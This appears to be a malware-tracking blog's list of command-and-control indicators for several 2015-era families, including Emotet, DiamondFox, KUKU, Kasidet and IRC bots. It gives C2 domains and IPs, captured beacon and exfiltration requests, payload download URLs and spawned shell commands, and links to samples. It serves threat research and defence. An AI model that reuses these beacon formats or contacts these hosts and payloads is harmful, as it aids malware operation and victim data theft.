Tries to steal FTP credentials (details: “WAREsmartftpclient 2.0settingsbackup”, indicator: “smartftp”). Sample here.
Server: 188.138.40.39:18892
Hosting info: http://whois.domaintools.com/188.138.40.39
damcodes777.cc (HTTP malware hosted in Russian Federation, Moscow, Fast Serv Inc.)
damcodes777.cc 86.105.227.124
URL: hxxp://damcodes777.cc/b/connect/2
Data (the POST body field cs=aW5zZXJ0 is base64 for “insert”):
POST /b/connect/2 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0)
Host: damcodes777.cc
Content-Length: 51
Cache-Control: no-cache

cs=aW5zZXJ0&p=Windows+XP+32+HOME&m=3107216218&v=3.0
Hosting info: http://whois.domaintools.com/86.105.227.124
ptmr1.in (HTTP botnet hosted in France, Roubaix, OVH SAS)
DNS requests (request / result): ptmr1.in 94.23.104.199
HTTP command (the query parameter names are ROT13-encoded: frevny=serial, bf=os, qrynl=delay, irefvba=version, hcqngvzr=updatime):
GET /~clientes/i/i.php?frevny=fQ90R444P&bf=KC-FC8&qrynl=855555&irefvba=f6557&hcqngvzr=5
Hosting info: http://whois.domaintools.com/94.23.104.199
gigasbh.org (IRC botnet hosted in France, Paris, 1&1 Internet AG)
Domains (domain / IP):
f.eastmoon.pl 148.81.111.101
s.richlab.pl 148.81.111.101
gigasbh.org 82.165.129.253
IRC traffic:
>> NICK {USA-XPx86a}cwecttyo
>> USER cwectty 7949 7840 :cwectty
>> MODE {USA-XPx86a}cwecttyo +iwG
>> JOIN #sp yap
>> PING 422 MOTD
<< 332 {USA-XPx86a}cwecttyo #sp :
<< 333 {USA-XPx86a}cwecttyo #sp x 1436609273
>> PONG 422
197.85.182.110 (Trojan Emotet hosted in South Africa, Cape Town, Mweb Connect (Proprietary) Limited)
Spawned process “cmd.exe” with command line “/c C:/winclient.au3” (UID: 00009516-00001892). AutoIt strings inside; this malware may also be coded in AutoIt.
Injected into “CCleaner.exe” at 2015-7-2.14:59:47.395 (UID: 00009516-00000996).
Contacts very many different hosts: “197.85.182.110:8080” “162.144.35.78:8080” “158.255.238.209:8080” “198.1.122.176:8080” “119.59.124.163:8080” “200.159.128.132:8080” “88.208.228.111:8080” “162.144.88.73:8080” “103.245.153.70:8080” “103.228.200.37:8080”
POSTs files to a webserver:
POST /b215de35/f5665861/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible;
upd.upd4ter.com (malware hosted in Spain, Madrid, Propelin Consulting S.L.U.)
Contacts domain: upd.upd4ter.com
Contacts server: 93.189.33.108:80
In general it steals passwords from browsers and collects all the information it can from the infected machine.
GET /installer_stats/?action_id=1003&action_description=Virtual&channel_id=&channel_subid=1&channel_param=0&installer_id=101&installer_version=1.1.9.15182&user_registry=0&user_id=&user_hdd=&user_hdd_volume=&user_mac=&user_mb=&user_bios=&user_os=6.1&user_os_arch=&user_cpu=&user_win_identifier=&process_parent=&user_browsers=&user_default_browser=&user_date=&user_vm=&user_antivirus=s)%20Available.&user_dotnet=&channel=&partner=&aff_id= HTTP/1.1
User-Agent: NSIS_ToolkitOffers (Mozilla)
Host: upd.upd4ter.com
Cache-Control: no-cache
Sample here.
Hosting info: http://whois.domaintools.com/93.189.33.108
Gorynych/DiamondFox (hosted in Hungary, Budapest, Doclerweb Kft)
Thanks to Xylitol for the panels and executables.
Panels:
hxxp://computergraphics.in/
hxxp://my-right.fr/
hxxp://bntnl.com/
Files:
PO_37263_pdf.com > bntnl.com/Diamond/Panel/post.php?pl=&slots=1 HTTP/1.1
Xylitol posted a video showing a vulnerability in the panel; the Russian operator behind it has since updated the panel.
Hosting info: http://whois.domaintools.com/80.77.123.90
KUKU v4.08 beta (malware hosted in Germany, Dortmund, 1&1 Internet AG)
Another version of this malware; some domains have changed.
Domains (domain / IP):
makemegood24.com 213.165.83.176
1453eea.makemegood24.com 74.208.153.9
aaakemegood24.com 146.148.34.125
ww11.aaakemegood24.com 166.78.106.200
abakemegood24.com 50.21.181.152
acakemegood24.com 74.208.164.166
adakemegood24.com 74.208.153.9
aeakemegood24.com 87.106.20.192
afakemegood24.com
perfectchoice1.com 193.166.255.171
1459e2b.perfectchoice1.com 193.166.255.171
All hosts: 74.208.164.166 87.106.253.18 54.210.47.225 166.78.106.200 87.106.20.192 213.165.83.176 87.106.250.34 193.166.255.171
URLs:
http://1453eea.makemegood24.com/?1453eea=21315306&id=212331279066
GET /?1453eea=21315306&id=212331279066 HTTP/1.1
User-Agent: KUKU v4.08 beta =212331279066
Host: 1453eea.makemegood24.com
Cache-Control: no-cache
http://perfectchoice1.com/?1459c9a=21339290&id=212331279066
GET
gohome.cathosting.ninja (IRC botnet hosted in Netherlands, Roosendaal, NFOrce Entertainment B.V.)
Thanks to the anonymous guy who sent me the executable.
Domain used by the bot to connect to the server: gohome.cathosting.ninja
IRC connection: 188.209.49.76:6667
Files downloaded by the bot:
URL: hxxp://sunnyamk.com/biox.exe
URL: hxxp://sunnyamk.com/11111111111111111111111111111111111111111.exe
URL: hxxp://sunnyamk.com/qVQLzrpnA7D1X3KwCPse4y00hP6aHIXyiQiyyhlX.exe
All domains (domain / address / country):
www.sunnyamk.com 188.209.49.76 Romania
sunnyamk.com 188.209.49.76 Romania
gohome.cathosting.ninja 188.209.49.76 Romania
Samples here.
jdsiwiqweiqwyreqwi.com (Kasidet aka Neutrino bot)
Thanks to Xylitol for the name of the bot.
Contacts domains: “34324325kgkgfkgf.com” “dsffdsk323721372131.com” “fdshjfsh324332432.com” “jdsiwiqweiqwyreqwi.com”
Runs shell commands: “cmd /c C:\Users\PSPUBWS\AppData\Local\Temp\243765.bat” “C:\38650f5c2beb183eaaba236d1b576c255a9be49af34db85705bed16d23ea11” on 2015-6-6.13:57:14.679
Dropped files: “UserInfo.dll” has type “PE32 executable (DLL) (GUI) Intel 80386, for MS Windows”